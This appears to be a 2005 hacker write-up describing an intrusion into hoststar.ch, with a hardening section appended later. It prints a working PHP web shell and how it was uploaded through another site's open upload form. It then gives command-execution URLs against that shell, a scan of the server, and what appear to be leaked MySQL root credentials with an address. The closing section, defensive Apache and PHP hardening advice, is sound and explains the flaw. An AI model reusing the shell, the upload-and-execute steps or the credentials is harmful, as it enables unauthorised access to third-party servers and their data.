====================================================
How to gain r00t SQL access on hoststar.ch MySQL Servers
====================================================

Discovered by: Simon

php_admin_value open_basedir /docroot

PROBLEM TWO

Executing PHP scripts:

Since I now know that "Safe Mode" is not active, I can execute server commands with a simple PHP script:

Shell.php
------>
<?php
// The HTML tags of this script were lost when the page was extracted; the
// title and form below are reconstructed around the echo statements that
// survived. The page's own usage (shell.php?command=...) fixes the field name.
echo "<title>Shell by z9diac</title>";
echo "\n<form method=\"get\">\n";
echo "command: ";
echo "<input type=\"text\" name=\"command\">";
echo "<input type=\"submit\" value=\"run\">";
echo "</form>\n";

// The 2005 original relied on register_globals to turn ?command= into
// $command; read it explicitly so the script also runs on later PHP.
$command = isset($_REQUEST['command']) ? $_REQUEST['command'] : '';

// Run the command through the system shell and return its output.
$output = shell_exec($command);
// Turn newlines into line breaks for the browser (the replacement tag was
// lost in extraction; <br> assumed).
$output = str_replace("\xa", "<br>\n", $output);
// Markers so the output can be cut out of the surrounding HTML.
echo "_START_\n";
echo($output);
echo "_END_\n";
/* this is the old command from version 0.2: system("$command"); */
exit();
?>
<-----

Since I do not have a user account on hoststar.ch, I found a website that offers me an upload facility:

http://www.chlorium.ch/index.php?site=download

and afterwards:

http://www.chlorium.ch/download/shell.php ;)

Executing commands via shell.php:

http://www.chlorium.ch/download/shell.php?command=uname+-a
http://www.chlorium.ch/download/shell.php?command=ifconfig
http://www.chlorium.ch/download/shell.php?command=finger+root
http://www.chlorium.ch/download/shell.php?command=cd+%2Fhome%3B+ls
http://www.chlorium.ch/download/shell.php?command=cd+%2Fhome%2Fwww%3B+ls

I was now able to read the MySQL config:

http://213.133.109.162/phpMyAdmin/
User: root
Password: 15mnbs

According to an nmap scan the services are up to date (note, though, that OpenSSH advertises protocol 1.99, which means the server still accepts SSH protocol 1 connections):

root@z9diac:~# nmap -sS -sV -O hoststar.ch

Starting nmap 3.50 ( http://www.insecure.org/nmap/ ) at 2005-07-28 15:05 CEST
Interesting ports on tux1.hoststar.ch (213.133.109.162):
(The 1647 ports scanned but not shown below are in state: closed)
PORT     STATE    SERVICE  VERSION
21/tcp   open     ftp
22/tcp   open     ssh      OpenSSH 3.5p1 (protocol 1.99)
25/tcp   open     smtp     Sendmail 8.12.11/8.12.11
53/tcp   open     domain   ISC Bind 9.2.3
80/tcp   open     http     Apache httpd 1.3.29 ((Unix))
110/tcp  open     pop3     UW Imap pop3 server 2003.83
111/tcp  open     rpcbind  2 (rpc #100000)
143/tcp  open     imap?
443/tcp  open     http     Apache httpd 1.3.29 ((Unix))
587/tcp  open     smtp     Sendmail 8.12.11/8.12.11
6667/tcp filtered irc
6969/tcp filtered acmsoda
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port21-TCP:V=3.50%D=7/28%Time=42E8D80C%P=i486-slackware-linux-gnu%r(NUL
SF:L,17,"220\x20FTP\x20Server\x20ready\.\r\n")%r(GenericLines,17,"220\x20F
SF:TP\x20Server\x20ready\.\r\n")%r(Help,220,"220\x20FTP\x20Server\x20ready
SF:\.\r\n214-The\x20following\x20commands\x20are\x20recognized\x20\(\*\x20
SF:=>'s\x20unimplemented\):\r\n\x20CWD\x20\x20\x20\x20\x20XCWD\x20\x20\x20
SF:\x20CDUP\x20\x20\x20\x20XCUP\x20\x20\x20\x20SMNT\*\x20\x20\x20QUIT\x20\
SF:x20\x20\x20PORT\x20\x20\x20\x20PASV\x20\x20\x20\x20\r\n\x20EPRT\x20\x20
SF:\x20\x20EPSV\x20\x20\x20\x20ALLO\*\x20\x20\x20RNFR\x20\x20\x20\x20RNTO\
SF:x20\x20\x20\x20DELE\x20\x20\x20\x20MDTM\x20\x20\x20\x20RMD\x20\x20\x20\
SF:x20\x20\r\n\x20XRMD\x20\x20\x20\x20MKD\x20\x20\x20\x20\x20XMKD\x20\x20\
SF:x20\x20PWD\x20\x20\x20\x20\x20XPWD\x20\x20\x20\x20SIZE\x20\x20\x20\x20S
SF:YST\x20\x20\x20\x20HELP\x20\x20\x20\x20\r\n\x20NOOP\x20\x20\x20\x20FEAT
SF:\x20\x20\x20\x20OPTS\x20\x20\x20\x20AUTH\*\x20\x20\x20CCC\*\x20\x20\x20
SF:\x20CONF\*\x20\x20\x20ENC\*\x20\x20\x20\x20MIC\*\x20\x20\x20\x20\r\n\x2
SF:0PBSZ\*\x20\x20\x20PROT\*\x20\x20\x20TYPE\x20\x20\x20\x20STRU\x20\x20\x
SF:20\x20MODE\x20\x20\x20\x20RETR\x20\x20\x20\x20STOR\x20\x20\x20\x20STOU\
SF:x20\x20\x20\x20\r\n\x20APPE\x20\x20\x20\x20REST\x20\x20\x20\x20ABOR\x20
SF:\x20\x20\x20USER\x20\x20\x20\x20PASS\x20\x20\x20\x20ACCT\*\x20\x20\x20R
SF:EIN\*\x20\x20\x20LIST\x20\x20\x20\x20\r\n214\x20Direct\x20comments\x20t
SF:o\x20technik@login-1\.hoststar\.ch\r\n");
No exact OS matches for host (If you know what OS is running on it, see http://www.insecure.org/cgi-bin/nmap-submit.cgi).
TCP/IP fingerprint:
SInfo(V=3.50%P=i486-slackware-linux-gnu%D=7/28%Time=42E8D82C%O=21%C=1)
TSeq(Class=RI%gcd=1%SI=334202%TS=100HZ)
TSeq(Class=RI%gcd=1%SI=334879%TS=100HZ)
TSeq(Class=RI%gcd=2%SI=19AACF%TS=100HZ)
T1(Resp=Y%DF=Y%W=16A0%ACK=S++%Flags=AS%Ops=MNNTNW)
T2(Resp=N)
T3(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=)
T4(Resp=Y%DF=Y%W=0%ACK=O%Flags=R%Ops=)
T5(Resp=Y%DF=Y%W=0%ACK=S++%Flags=AR%Ops=)
T6(Resp=Y%DF=Y%W=0%ACK=O%Flags=R%Ops=)
T7(Resp=Y%DF=Y%W=0%ACK=S++%Flags=AR%Ops=)
PU(Resp=N)

Uptime 0.826 days (since Wed Jul 27 19:16:38 2005)
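What the write-up above actually relies on is that a hosting account can upload a PHP file into a web-served directory and that PHP there is allowed to call shell_exec(). The open_basedir setting seen on the server only fences file access done through PHP's own functions; it does not restrict what a shell spawned by shell_exec(), system() or popen() can read, and safe_mode was never a reliable boundary either (it was removed in PHP 5.4). The following Apache virtual-host fragment is an added example, not configuration from the original write-up or from hoststar.ch; the vhost name, document root and upload directory are assumptions. It places the weak setting the write-up found next to a hardened one that disables the process-spawning functions and stops PHP from executing anything in the upload directory at all:

```apache
# --- Weak: roughly what the write-up found (vhost/paths assumed) ---
<VirtualHost *:80>
    ServerName www.chlorium.ch
    DocumentRoot /docroot
    # Fences fopen()/include() etc. inside PHP only. A child process started
    # by shell_exec("cat /etc/passwd") is not subject to open_basedir.
    php_admin_value open_basedir /docroot
    # safe_mode is off, so shell_exec/system/passthru all work for any
    # PHP file that lands under /docroot, including an uploaded shell.php.
</VirtualHost>

# --- Hardened ---
<VirtualHost *:80>
    ServerName www.chlorium.ch
    DocumentRoot /docroot
    php_admin_value open_basedir "/docroot:/tmp"
    # Remove every function a web shell needs to spawn a process. This is a
    # PHP_INI_SYSTEM setting, so it must be php_admin_value and cannot be
    # re-enabled from a script or .htaccess.
    php_admin_value disable_functions "exec,shell_exec,system,passthru,popen,proc_open,pcntl_exec"

    # The upload directory (assumed path) must never run PHP: turn the PHP
    # engine off there and refuse to serve PHP-looking files at all.
    <Directory /docroot/download>
        php_admin_flag engine Off
        # Apache 1.3/2.2 access syntax; on Apache 2.4 use "Require all denied".
        <FilesMatch "\.(php|php[0-9]|phtml|phar)$">
            Order allow,deny
            Deny from all
        </FilesMatch>
    </Directory>
</VirtualHost>
```

To check the hardened vhost, drop a one-line test file containing `<?php var_dump(shell_exec('id')); ?>` outside the upload directory: PHP should log a warning that shell_exec() has been disabled for security reasons and return NULL, and the same file placed under /docroot/download should be refused (403) rather than executed. Since the write-up's shell was reached through an unauthenticated upload form, the upload handler itself should additionally rename files to a generated name and reject anything that is not an expected content type.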